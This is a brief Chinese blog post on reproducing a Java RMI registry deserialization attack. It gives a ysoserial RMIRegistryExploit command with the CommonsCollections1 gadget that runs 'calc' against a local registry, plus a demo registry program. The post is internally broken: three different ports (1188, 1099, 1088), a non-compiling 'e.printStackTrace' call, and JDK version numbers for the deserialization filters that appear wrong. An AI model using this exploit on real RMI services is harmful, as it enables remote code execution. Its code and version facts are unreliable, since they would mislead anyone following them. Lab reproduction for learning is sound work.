RMI拓展
2022/3/7 6:16:57
本文主要是介绍RMI拓展,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
版本要求:
从JDK8u21、7u13、6u141开始,JDK为RMI注册表和RMI分布式垃圾收集器内置了过滤器,只允许特定的类进行反序列化。Registry无法成功攻击RMI。
漏洞复现过程:
1.启动RMI注册机制
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1088 CommonsCollections1 "calc"
2.运行程序触发计算器
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class RMIDemo {
public static void main(String[] args) {
try {
Registry registry = LocateRegistry.createRegistry(1188);
System.out.println("127.0.0.1:1099");
while (true) ;
} catch (Exception e) {
e.printStackTrace;
}
}
}
这篇关于RMI拓展的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23Springboot应用的多环境打包入门
- 2024-11-23Springboot应用的生产发布入门教程
- 2024-11-23Python编程入门指南
- 2024-11-23Java创业入门:从零开始的编程之旅
- 2024-11-23Java创业入门:新手必读的Java编程与创业指南
- 2024-11-23Java对接阿里云智能语音服务入门详解
- 2024-11-23Java对接阿里云智能语音服务入门教程
- 2024-11-23JAVA对接阿里云智能语音服务入门教程
- 2024-11-23Java副业入门:初学者的简单教程
- 2024-11-23JAVA副业入门:初学者的实战指南
